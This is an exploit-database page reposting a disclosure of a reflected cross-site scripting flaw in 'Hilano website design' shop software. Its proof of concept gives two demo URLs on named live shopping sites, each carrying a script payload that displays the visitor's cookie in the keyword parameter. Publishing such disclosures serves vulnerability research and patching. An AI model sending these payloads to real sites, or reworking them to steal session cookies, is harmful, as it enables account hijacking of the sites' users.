Advertisement






Hilano website design - Cross-Site Scripting (XSS)

CVE Category Price Severity
N/A CWE-79 Unknown Medium
Author Risk Exploitation Type Date
Unknown Medium Remote 2023-08-12
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023080056

Below is a copy:

Hilano website design - Cross-Site Scripting (XSS)
*********************************************************
#Exploit Title: Hilano website design - Cross-Site Scripting (XSS)
#Date: 2023-08-12
#Exploit Author: Behrouz Mansoori
#Google Dork: "  "
#Category:webapps
#Tested On: Mac, Firefox

Proof of Concept:
### Demo :

https://www.nilimarket.com/product.php?keyword=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://www.arkaazmashop.com/product.php?keyword=%3Cscript%3Ealert(document.cookie)%3C/script%3E

*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.